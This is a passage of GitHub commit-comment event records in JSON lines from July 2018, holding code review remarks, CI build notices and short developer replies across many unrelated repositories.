{"id":"7967964360","type":"CommitCommentEvent","actor":{"login":"tomschenkjr"},"repo":{"name":"Chicago/predicting-e-coli-concentrations"},"payload":{"comment":{"id":29714327,"position":87,"line":219,"path":"predicting-e-coli-concentrations.Rmd","commit_id":"05c6ba2a059a226bbeeb34f0147f813a42ba36eb","created_at":"2018-07-15T21:09:41Z","updated_at":"2018-07-15T21:09:41Z","author_association":"MEMBER","body":"To find the clusters, that was done using data between 2006 through 2016, correct?"}},"created_at":"2018-07-15T21:09:41Z"}
{"id":"7967965186","type":"CommitCommentEvent","actor":{"login":"puresky07"},"repo":{"name":"puresky07/selfStats"},"payload":{"comment":{"id":29714328,"position":null,"line":null,"path":null,"commit_id":"0c80ef9f3ef7b4541240a8b8fbc657022c8f29cf","created_at":"2018-07-15T21:10:20Z","updated_at":"2018-07-15T21:10:20Z","author_association":"OWNER","body":"plus qu'à trouver comment merger..."}},"created_at":"2018-07-15T21:10:20Z"}
{"id":"7967965383","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29714329,"position":34,"line":34,"path":"group/assignment5/UnknownAlphabet.java","commit_id":"4bfaace1621b86ad9416d28f7b43ebe0baa1df4f","created_at":"2018-07-15T21:10:28Z","updated_at":"2018-07-15T21:10:28Z","author_association":"COLLABORATOR","body":"I think I've implemented this function more elegantly. \r\nPlease look at \"createConstrainsGraph\" at AlphabetGenerator.java"}},"created_at":"2018-07-15T21:10:28Z"}
{"id":"7967965854","type":"CommitCommentEvent","actor":{"login":"nicklucius"},"repo":{"name":"Chicago/predicting-e-coli-concentrations"},"payload":{"comment":{"id":29714330,"position":87,"line":219,"path":"predicting-e-coli-concentrations.Rmd","commit_id":"05c6ba2a059a226bbeeb34f0147f813a42ba36eb","created_at":"2018-07-15T21:10:50Z","updated_at":"2018-07-15T21:10:50Z","author_association":"CONTRIBUTOR","body":"Yep correct.\n\nNick Lucius\nData Scientist\nAdvanced Analytics\nDepartment of Innovation and Technology\nCity of Chicago\n(312) 744-5339\nnicholas.lucius2@cityofchicago.org | data.cityofchicago.org | dev.cityofchicago.org | digital.cityofchicago.org\n________________________________\nFrom: Tom Schenk Jr <notifications@github.com>\nSent: Sunday, July 15, 2018 3:09:41 PM\nTo: Chicago/predicting-e-coli-concentrations\nCc: Nicholas Lucius; Author\nSubject: Re: [Chicago/predicting-e-coli-concentrations] Grammer and style changes, resolves #64 (05c6ba2)\n\n\nTo find the clusters, that was done using data between 2006 through 2016, correct?\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://protect2.fireeye.com/url?k=6c094c98d7373c5c.6c0998f0-2c352c6cf5f2a64a&u=https://github.com/Chicago/predicting-e-coli-concentrations/commit/05c6ba2a059a226bbeeb34f0147f813a42ba36eb#commitcomment-29714327>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AQEqM3Qpe1MoqVYhWBYSeRLXj4-Vi49xks5uG6-VgaJpZM4VQC2V>.\n\n\n________________________________\nThis e-mail, and any attachments thereto, is intended only for use by the addressee(s) named herein and may contain legally privileged and/or confidential information. If you are not the intended recipient of this e-mail (or the person responsible for delivering this document to the intended recipient), you are hereby notified that any dissemination, distribution, printing or copying of this e-mail, and any attachment thereto, is strictly prohibited. If you have received this e-mail in error, please respond to the individual sending the message, and permanently delete the original and any copy of any e-mail and printout thereof.\n"}},"created_at":"2018-07-15T21:10:50Z"}
{"id":"7967966569","type":"CommitCommentEvent","actor":{"login":"AkyrApain"},"repo":{"name":"AkyrApain/hello-world"},"payload":{"comment":{"id":29714332,"position":null,"line":null,"path":null,"commit_id":"b24d3a80d7fc9cdf1d7f0bd24073ac40951976c9","created_at":"2018-07-15T21:11:25Z","updated_at":"2018-07-15T21:11:25Z","author_association":"OWNER","body":"https://es.oriflame.com/products/digital-catalogue-current?pageNumber=1&catalogue=2018010"}},"created_at":"2018-07-15T21:11:25Z"}
{"id":"7967967014","type":"CommitCommentEvent","actor":{"login":"akramtexas"},"repo":{"name":"akramtexas/edgex-go"},"payload":{"comment":{"id":29714336,"position":null,"line":null,"path":null,"commit_id":"61165d4bf92ecccfd7cb49cf7aa09e34a48f9897","created_at":"2018-07-15T21:11:45Z","updated_at":"2018-07-15T21:11:45Z","author_association":"OWNER","body":"The remaining work in this area (MongoClient handler-related) has to do with the full golang struct not being fetched from the MongoDB instance.\r\n"}},"created_at":"2018-07-15T21:11:45Z"}
{"id":"7967967703","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29714338,"position":34,"line":34,"path":"group/assignment5/UnknownAlphabet.java","commit_id":"4bfaace1621b86ad9416d28f7b43ebe0baa1df4f","created_at":"2018-07-15T21:12:19Z","updated_at":"2018-07-15T21:12:19Z","author_association":"COLLABORATOR","body":"Also, there's a documentation for this function that we can borrow."}},"created_at":"2018-07-15T21:12:19Z"}
{"id":"7967967726","type":"CommitCommentEvent","actor":{"login":"PascalSchumacher"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":29714339,"position":null,"line":null,"path":null,"commit_id":"ed39d0106d1f9a0101b61620daf95f2e39a704c1","created_at":"2018-07-15T21:12:20Z","updated_at":"2018-07-15T21:12:20Z","author_association":"NONE","body":"Not sure if it matters, but groovy-all still exists in version 2.5+ (see: https://search.maven.org/#artifactdetails%7Corg.codehaus.groovy%7Cgroovy-all%7C2.5.0%7Cpom). Its type was changed frow `jar` to `pom`."}},"created_at":"2018-07-15T21:12:20Z"}
{"id":"7967968660","type":"CommitCommentEvent","actor":{"login":"ZombieEnderman5"},"repo":{"name":"pmgl/starblast-modding"},"payload":{"comment":{"id":29714340,"position":null,"line":null,"path":null,"commit_id":"a1d61ee87603bcb01f046f8c00876dd6c9c08fe4","created_at":"2018-07-15T21:13:08Z","updated_at":"2018-07-15T21:13:08Z","author_association":"CONTRIBUTOR","body":"@pmgl Did you intend to put `automagically` rather than `automatically`? Not sure how people who speak English as a second language spell `automatic` and its derivatives (`automatically` etc.)"}},"created_at":"2018-07-15T21:13:08Z"}
{"id":"7967969070","type":"CommitCommentEvent","actor":{"login":"microbuilder"},"repo":{"name":"apache/mynewt-core"},"payload":{"comment":{"id":29714341,"position":21,"line":71,"path":"hw/drivers/sensors/tsl2561/src/tsl2561.c","commit_id":"adb0b278107428f46ad36632fdc1327f9ccfb231","created_at":"2018-07-15T21:13:27Z","updated_at":"2018-07-15T21:13:27Z","author_association":"CONTRIBUTOR","body":"@ccollins476ad Is this missing a matching `#if` type check to go with the `#else` and `#endif`? I'm updating my TSL2591 PR to reflect recent changes and just noticed this when comparing files."}},"created_at":"2018-07-15T21:13:27Z"}
{"id":"7967969370","type":"CommitCommentEvent","actor":{"login":"cummingsm"},"repo":{"name":"cummim/Sierra-Clancy-request-export"},"payload":{"comment":{"id":29714342,"position":null,"line":null,"path":null,"commit_id":"e54fccbfd5caed407dc915e1347273a31cf5cc06","created_at":"2018-07-15T21:13:43Z","updated_at":"2018-07-15T21:13:43Z","author_association":"NONE","body":"Lines 44-64 of the API Python scripts are straight out of a demonstration template provided by Milton Howard, Innovative Interfaces."}},"created_at":"2018-07-15T21:13:43Z"}
{"id":"7967970146","type":"CommitCommentEvent","actor":{"login":"iAroc"},"repo":{"name":"iAroc/iAroc.github.io"},"payload":{"comment":{"id":29714347,"position":null,"line":null,"path":null,"commit_id":"ab50dd14e3bd5af2d4e5e78b442fc733d43900b1","created_at":"2018-07-15T21:14:17Z","updated_at":"2018-07-15T21:14:17Z","author_association":"OWNER","body":"fixed in commit https://github.com/iAroc/iAroc.github.io/commit/71005f6ef1be2bf5a780c4ecd4e230410d8e93c6"}},"created_at":"2018-07-15T21:14:17Z"}
{"id":"7967970912","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29714348,"position":13,"line":13,"path":"group/assignment5/Graph.java","commit_id":"4bfaace1621b86ad9416d28f7b43ebe0baa1df4f","created_at":"2018-07-15T21:14:56Z","updated_at":"2018-07-15T21:14:56Z","author_association":"COLLABORATOR","body":"Maybe this class should use generics"}},"created_at":"2018-07-15T21:14:56Z"}
{"id":"7967972644","type":"CommitCommentEvent","actor":{"login":"cass420"},"repo":{"name":"cass420/nevertheless-ur-hacking"},"payload":{"comment":{"id":29714352,"position":null,"line":null,"path":null,"commit_id":"01903800997b68d54d0f9929cb64d091a8ee4b79","created_at":"2018-07-15T21:16:16Z","updated_at":"2018-07-15T21:16:16Z","author_association":"OWNER","body":"[](url)nevertheless-ur-hacking/2018-07-15_12-11-31.txt.gz"}},"created_at":"2018-07-15T21:16:16Z"}
{"id":"7967973118","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29714353,"position":27,"line":27,"path":"group/assignment5/Graph.java","commit_id":"4bfaace1621b86ad9416d28f7b43ebe0baa1df4f","created_at":"2018-07-15T21:16:40Z","updated_at":"2018-07-15T21:16:40Z","author_association":"COLLABORATOR","body":"Have you handled the case of an edge from a vertex to itself?"}},"created_at":"2018-07-15T21:16:40Z"}
{"id":"7967974773","type":"CommitCommentEvent","actor":{"login":"smarr"},"repo":{"name":"daumayr/SOMns"},"payload":{"comment":{"id":29714354,"position":null,"line":null,"path":null,"commit_id":"25de9c70a5a67d5c87040baee081160e89ce7c5d","created_at":"2018-07-15T21:18:01Z","updated_at":"2018-07-15T21:18:01Z","author_association":"NONE","body":"This commit does not have proper author information\r\n\r\n`Author: Unknown <daumayr162@gmail.com>`\r\n\r\nIt also does not have a commit message that explains the change."}},"created_at":"2018-07-15T21:18:01Z"}
{"id":"7967975074","type":"CommitCommentEvent","actor":{"login":"smarr"},"repo":{"name":"daumayr/SOMns"},"payload":{"comment":{"id":29714355,"position":null,"line":null,"path":null,"commit_id":"be140c90b09468e0aae180ad9cede8bd19851b34","created_at":"2018-07-15T21:18:14Z","updated_at":"2018-07-15T21:18:14Z","author_association":"NONE","body":"This commit does not have proper author information\r\n\r\n`Author: Unknown <daumayr162@gmail.com>`"}},"created_at":"2018-07-15T21:18:14Z"}
{"id":"7967976305","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29714357,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-15T21:19:14Z","updated_at":"2018-07-15T21:19:14Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - i386-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T21:19:14Z"}
{"id":"7967976683","type":"CommitCommentEvent","actor":{"login":"Uriy89"},"repo":{"name":"Uriy89/job4j"},"payload":{"comment":{"id":29714358,"position":null,"line":null,"path":null,"commit_id":"0bebf8a7d897708c09a880a3eb97c5b68c8ba5a7","created_at":"2018-07-15T21:19:33Z","updated_at":"2018-07-15T21:19:33Z","author_association":"OWNER","body":"ок"}},"created_at":"2018-07-15T21:19:33Z"}
{"id":"7967976770","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29714359,"position":null,"line":null,"path":null,"commit_id":"85388901cf6a69659569ad751767fd7108b25a3c","created_at":"2018-07-15T21:19:38Z","updated_at":"2018-07-15T21:19:38Z","author_association":"MEMBER","body":"@Yehonal I had a problem with one module and the \"include.sh\" because it was using windows line endings and I am on Linux, so I added .gitattributes and solved it\r\n\r\nAlso, please push a placeholder readme or something like that!"}},"created_at":"2018-07-15T21:19:38Z"}
{"id":"7967978588","type":"CommitCommentEvent","actor":{"login":"smarr"},"repo":{"name":"daumayr/SOMns"},"payload":{"comment":{"id":29714361,"position":null,"line":null,"path":null,"commit_id":"5ab0e8a6fc9397f2ae289c5938edad6145d5f6ec","created_at":"2018-07-15T21:21:05Z","updated_at":"2018-07-15T21:21:05Z","author_association":"NONE","body":"This commit does not have a commit message that explains the change.\r\n\r\nAnd it contains a lot of changes that seem to be entirely unrelated.\r\nWhat's the deal with the Files.ns and related changes? Why can't this be done separately?"}},"created_at":"2018-07-15T21:21:05Z"}
{"id":"7967980937","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714365,"position":null,"line":null,"path":null,"commit_id":"9c1b27d79f04db1136933b695f7b7b6ead36470b","created_at":"2018-07-15T21:22:58Z","updated_at":"2018-07-15T21:22:58Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 497](https://ci.hashicorp.engineering/viewLog.html?buildId=104040&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T21:22:58Z"}
{"id":"7967981105","type":"CommitCommentEvent","actor":{"login":"ihzapassya"},"repo":{"name":"ihzapassya/ihzapassya.github.io"},"payload":{"comment":{"id":29714366,"position":null,"line":null,"path":null,"commit_id":"521e10fe0c6d56e20fe5fefce0137e052c2a917b","created_at":"2018-07-15T21:23:08Z","updated_at":"2018-07-15T21:23:08Z","author_association":"OWNER","body":"Tes"}},"created_at":"2018-07-15T21:23:08Z"}
{"id":"7967981700","type":"CommitCommentEvent","actor":{"login":"smarr"},"repo":{"name":"daumayr/SOMns"},"payload":{"comment":{"id":29714367,"position":1,"line":1,"path":"src/tools/concurrency/MedeorTrace.java","commit_id":"5ab0e8a6fc9397f2ae289c5938edad6145d5f6ec","created_at":"2018-07-15T21:23:36Z","updated_at":"2018-07-15T21:23:36Z","author_association":"NONE","body":"I seem to remember that I mentioned that this is not the right name.\r\n\r\nMedeor is the name for all the debugging stuff in SOMns.\r\nAs such, it should be the name of the subsystem/package.\r\n\r\nKompos is the name of the protocol.\r\nAnd this this class realizes the tracing for one specific protocol, it should be named after it. So, KomposTrace.\r\nSame for all the other names."}},"created_at":"2018-07-15T21:23:36Z"}
{"id":"7967982437","type":"CommitCommentEvent","actor":{"login":"daviddbeasy"},"repo":{"name":"daviddbeasy/roll20-character-sheets"},"payload":{"comment":{"id":29714369,"position":null,"line":null,"path":null,"commit_id":"941b3c16547f7519d7286c19a55e3edbb4a9946a","created_at":"2018-07-15T21:24:10Z","updated_at":"2018-07-15T21:24:10Z","author_association":"OWNER","body":"I've already respond in the forum.\n\nEl vie., 13 jul. 2018 a las 8:48, uhu79 (<notifications@github.com>)\nescribió:\n\n> Great David! :)\n> Please use this forum to get in touch with me and I will tell you how and\n> where to access the current working environment (trello and roll20).\n>\n> https://rpggeek.com/thread/2024136/fellowship-roll20-character-sheet\n>\n> br, Stefan\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/daviddbeasy/roll20-character-sheets/commit/941b3c16547f7519d7286c19a55e3edbb4a9946a#commitcomment-29695522>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AZLpay-seXvht83817OsjlXzUWy-2xvrks5uGELHgaJpZM4VGQ8I>\n> .\n>\n"}},"created_at":"2018-07-15T21:24:10Z"}
{"id":"7967988086","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714378,"position":null,"line":null,"path":null,"commit_id":"9c1b27d79f04db1136933b695f7b7b6ead36470b","created_at":"2018-07-15T21:28:47Z","updated_at":"2018-07-15T21:28:47Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 497](https://ci.hashicorp.engineering/viewLog.html?buildId=104040&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:05:49"}},"created_at":"2018-07-15T21:28:47Z"}
{"id":"7967990502","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29714384,"position":null,"line":null,"path":null,"commit_id":"6b4d8d2ad9de7cdf40a38b407653ef324503f669","created_at":"2018-07-15T21:30:45Z","updated_at":"2018-07-15T21:30:45Z","author_association":"NONE","body":"### Results for event id: 4da5aa70-936c-4baf-872e-17d52bb0c2ee\n<details><summary>DockerServerless : Deploy to Lambda (eea752) Execution completed.</summary>\n<p>\n\n**output tail (276 lines total):**\n\n```\n...\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nServerless: Removing old service artifacts from S3...\nDone in 97.11s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 4da5aa70-936c-4baf-872e-17d52bb0c2ee-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/4da5aa70-936c-4baf-872e-17d52bb0c2ee-output.tar.gz\n{\n    \"ETag\": \"\\\"d97571cc084a35b91032ebe4833fdeb8\\\"\"\n}\nExecution time was 313 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T21:30:45Z"}
{"id":"7967994601","type":"CommitCommentEvent","actor":{"login":"garth-wells"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29714388,"position":21,"line":95,"path":"cpp/dolfin/io/XDMFFile.h","commit_id":"2a3ff3862573c154465b1719f65390c6ca0f64d7","created_at":"2018-07-15T21:33:59Z","updated_at":"2018-07-15T21:33:59Z","author_association":"MEMBER","body":"Let's remove this constructor. Aim is one way to do one things at the C++ level."}},"created_at":"2018-07-15T21:33:59Z"}
{"id":"7967994787","type":"CommitCommentEvent","actor":{"login":"ShinDarth"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29714389,"position":null,"line":null,"path":null,"commit_id":"85388901cf6a69659569ad751767fd7108b25a3c","created_at":"2018-07-15T21:34:09Z","updated_at":"2018-07-15T21:34:09Z","author_association":"MEMBER","body":"looks like a lot of work has been going on here... I don't mind yaml but I've always found json the clearest :)"}},"created_at":"2018-07-15T21:34:09Z"}
{"id":"7967996442","type":"CommitCommentEvent","actor":{"login":"wlandau"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29714391,"position":null,"line":null,"path":null,"commit_id":"6e3ee5adc43fc894738707e40c06baeb88665023","created_at":"2018-07-15T21:35:21Z","updated_at":"2018-07-15T21:35:21Z","author_association":"COLLABORATOR","body":"That sounds like the current behavior when `garbage_collection` is `TRUE`, with `gc()` called [at the end of `build_target()`](https://github.com/ropensci/drake/blob/968252c9104d0bd07f4f507f8d103c922614cf7b/R/build.R#L160). The overhead is noticeable enough that I am resisting it as the default setting.\r\n\r\n```r\r\nlibrary(drake)\r\nload_mtcars_example()\r\nmicrobenchmark::microbenchmark(\r\n  make(my_plan, garbage_collection = TRUE, trigger = \"always\", verbose = FALSE),\r\n  make(my_plan, garbage_collection = FALSE, trigger = \"always\", verbose = FALSE)\r\n)\r\n#> Unit: milliseconds\r\n#>                                                                                 expr\r\n#>  make(my_plan, garbage_collection = TRUE,  trigger = \"always\",      verbose = FALSE)\r\n#>  make(my_plan, garbage_collection = FALSE, trigger = \"always\",      verbose = FALSE)\r\n#>       min       lq      mean    median        uq       max neval\r\n#>  1143.423 1211.811 1246.7136 1249.0337 1279.3032 1435.6347   100\r\n#>   507.888  531.590  551.2924  550.1081  564.0957  620.3829   100\r\n```"}},"created_at":"2018-07-15T21:35:21Z"}
{"id":"7967997423","type":"CommitCommentEvent","actor":{"login":"cass420"},"repo":{"name":"cass420/nevertheless-ur-hacking"},"payload":{"comment":{"id":29714393,"position":null,"line":null,"path":null,"commit_id":"01903800997b68d54d0f9929cb64d091a8ee4b79","created_at":"2018-07-15T21:36:07Z","updated_at":"2018-07-15T21:36:07Z","author_association":"OWNER","body":"> 📋\r\n\r\n"}},"created_at":"2018-07-15T21:36:07Z"}
{"id":"7967998785","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714394,"position":null,"line":null,"path":null,"commit_id":"897bdd2dc5bd004560c258b2e20697bcefba081d","created_at":"2018-07-15T21:37:10Z","updated_at":"2018-07-15T21:37:10Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 498](https://ci.hashicorp.engineering/viewLog.html?buildId=104041&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T21:37:10Z"}
{"id":"7967999118","type":"CommitCommentEvent","actor":{"login":"antirez"},"repo":{"name":"RedisLabsModules/RediSearch"},"payload":{"comment":{"id":29714395,"position":690,"line":29,"path":"LICENSE","commit_id":"c516603c0705ccd14efc1623c4702cba63b8d262","created_at":"2018-07-15T21:37:24Z","updated_at":"2018-07-15T21:37:24Z","author_association":"NONE","body":"Hi there, looks like you want to replace <module name> with the module name here."}},"created_at":"2018-07-15T21:37:24Z"}
{"id":"7967999279","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714396,"position":null,"line":null,"path":null,"commit_id":"897bdd2dc5bd004560c258b2e20697bcefba081d","created_at":"2018-07-15T21:37:31Z","updated_at":"2018-07-15T21:37:31Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 498](https://ci.hashicorp.engineering/viewLog.html?buildId=104041&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:19"}},"created_at":"2018-07-15T21:37:31Z"}
{"id":"7968003375","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"KuzuriRosomak/KuzuriRosomak-Kodilla-Java"},"payload":{"comment":{"id":29714397,"position":41,"line":17,"path":"kodilla-stream/src/main/java/com/kodilla/stream/StreamMain.java","commit_id":"3020cf581a241e10457f882acf00c7ce8b81790e","created_at":"2018-07-15T21:40:37Z","updated_at":"2018-07-15T21:40:37Z","author_association":"NONE","body":"Rok nie powinien być zapisany ręcznie (1998).\r\nJeśli rok obecny się zmieni, kod przestanie działać prawidłowo. Możesz użyć albo odejmowania dat albo jednej z dodatkowych klas (Period, ChronoUnit)"}},"created_at":"2018-07-15T21:40:37Z"}
{"id":"7968004110","type":"CommitCommentEvent","actor":{"login":"Nar4Ku"},"repo":{"name":"Nar4Ku/Html-Css_Lorem"},"payload":{"comment":{"id":29714399,"position":null,"line":null,"path":null,"commit_id":"ce5118d64476f90312d818d5f6a13fa81302d637","created_at":"2018-07-15T21:41:10Z","updated_at":"2018-07-15T21:41:10Z","author_association":"OWNER","body":"png files"}},"created_at":"2018-07-15T21:41:10Z"}
{"id":"7968004493","type":"CommitCommentEvent","actor":{"login":"gabemontero"},"repo":{"name":"openshift/ci-operator"},"payload":{"comment":{"id":29714400,"position":10,"line":285,"path":"pkg/api/types.go","commit_id":"43ee594ac4b93fbcdd3780243ff630c83e86ac14","created_at":"2018-07-15T21:41:28Z","updated_at":"2018-07-15T21:41:28Z","author_association":"NONE","body":"Yep that follows along with the ci-vm-operator related discussion.  If we preserve any of this PR, this part will re removed."}},"created_at":"2018-07-15T21:41:28Z"}
{"id":"7968005671","type":"CommitCommentEvent","actor":{"login":"AkyrApain"},"repo":{"name":"AkyrApain/REBAJAS"},"payload":{"comment":{"id":29714401,"position":null,"line":null,"path":null,"commit_id":"f1449964068f0be2a7b1217fb9ce842982c4ff13","created_at":"2018-07-15T21:42:08Z","updated_at":"2018-07-15T21:42:08Z","author_association":"OWNER","body":"Ofrece servicios de peluqueria esteticien y masajes a domicilio,Productos para el cuidado del rostro,Fragancias, Wellness,Accesorios,Manualidades..."}},"created_at":"2018-07-15T21:42:08Z"}
{"id":"7968007773","type":"CommitCommentEvent","actor":{"login":"chrissythebuilder"},"repo":{"name":"chrissythebuilder/TravelPlanner"},"payload":{"comment":{"id":29714402,"position":49,"line":125,"path":"assets/css/style.css","commit_id":"48dbba7778c722badf6defdcc6a5762243682dc4","created_at":"2018-07-15T21:43:31Z","updated_at":"2018-07-15T21:43:31Z","author_association":"OWNER","body":"responsiveness"}},"created_at":"2018-07-15T21:43:31Z"}
{"id":"7968008293","type":"CommitCommentEvent","actor":{"login":"sajjacnu"},"repo":{"name":"sajjacnu/SQL"},"payload":{"comment":{"id":29714404,"position":null,"line":null,"path":null,"commit_id":"946fb2fe454422815620a0f56874be19ea929728","created_at":"2018-07-15T21:43:55Z","updated_at":"2018-07-15T21:43:55Z","author_association":"OWNER","body":"This is Assignment in SQL for Week 1"}},"created_at":"2018-07-15T21:43:55Z"}
{"id":"7968008712","type":"CommitCommentEvent","actor":{"login":"sajjacnu"},"repo":{"name":"sajjacnu/SQL"},"payload":{"comment":{"id":29714405,"position":null,"line":null,"path":null,"commit_id":"946fb2fe454422815620a0f56874be19ea929728","created_at":"2018-07-15T21:44:15Z","updated_at":"2018-07-15T21:44:15Z","author_association":"OWNER","body":"This is Assignment in SQL for Week 1"}},"created_at":"2018-07-15T21:44:15Z"}
{"id":"7968010994","type":"CommitCommentEvent","actor":{"login":"herunlei"},"repo":{"name":"zlkca/etuan"},"payload":{"comment":{"id":29714409,"position":4,"line":28,"path":"src/app/restaurant/restaurant-grid/restaurant-grid.component.ts","commit_id":"3ab1f1c065193bf2cbd3e9a28b6e96b493174aa5","created_at":"2018-07-15T21:45:56Z","updated_at":"2018-07-15T21:45:56Z","author_association":"COLLABORATOR","body":"Right now, the browser experience skip the home page, and it always go to restaurants page directly. So, localstorage doesn't have any location information. "}},"created_at":"2018-07-15T21:45:56Z"}
{"id":"7968011919","type":"CommitCommentEvent","actor":{"login":"sanchit94"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29714410,"position":null,"line":null,"path":null,"commit_id":"7fd31aa89d5ee0c51941041fc2d9e166a9b88674","created_at":"2018-07-15T21:46:40Z","updated_at":"2018-07-15T21:46:40Z","author_association":"COLLABORATOR","body":"I think I need to work on my indentation game!!"}},"created_at":"2018-07-15T21:46:40Z"}
{"id":"7968012590","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29714411,"position":null,"line":null,"path":null,"commit_id":"34bfffd919151737eabcdf68535cef61d47d0450","created_at":"2018-07-15T21:47:12Z","updated_at":"2018-07-15T21:47:12Z","author_association":"NONE","body":"wow wow wow, watch the language"}},"created_at":"2018-07-15T21:47:12Z"}
{"id":"7968014738","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29714412,"position":null,"line":null,"path":null,"commit_id":"9b81cb3c4b47725c91f99933ea6be95775e8ad54","created_at":"2018-07-15T21:49:00Z","updated_at":"2018-07-15T21:49:00Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-43](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-43).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-43-tre.pantheonsite.io/)"}},"created_at":"2018-07-15T21:49:00Z"}
{"id":"7968015535","type":"CommitCommentEvent","actor":{"login":"JonathanRugama"},"repo":{"name":"Elier-CoBa/Proyectos"},"payload":{"comment":{"id":29714415,"position":5,"line":26,"path":"proyectoServlets/src/Ingresar.java","commit_id":"63e953f254daed18f10297981d83c9ff04475565","created_at":"2018-07-15T21:49:40Z","updated_at":"2018-07-15T21:49:40Z","author_association":"NONE","body":"Será que no estamos haciendo la solicitud bien?"}},"created_at":"2018-07-15T21:49:40Z"}
{"id":"7968019822","type":"CommitCommentEvent","actor":{"login":"gabemontero"},"repo":{"name":"openshift/ci-operator"},"payload":{"comment":{"id":29714419,"position":24,"line":358,"path":"pkg/api/types.go","commit_id":"224fac486b0fce056df842a31df5c4c6028649ad","created_at":"2018-07-15T21:53:03Z","updated_at":"2018-07-15T21:53:03Z","author_association":"NONE","body":"It wasn't trying to block the separate Promotion step that is present if that is what you mean by Promotion.  There is an output image step that is implicitly created when an image step (i.e. the logic in project_image.go) is found.  This flag would inject the test as a required step link for the output image step.  Without this, I saw the output image step running in parallel with the test step, and not getting blocked.\r\n\r\nSo with this commit for the step in project_image.go as well as the step in output_image_tag.go would be blocked by the test.\r\n\r\nAs to the complexity of all this ... well, this is certainly a different scenario than the current usages of ci-operator.\r\nRather than:\r\n\r\n1) git clone/fetch src\r\n2) build binaries\r\n3) test 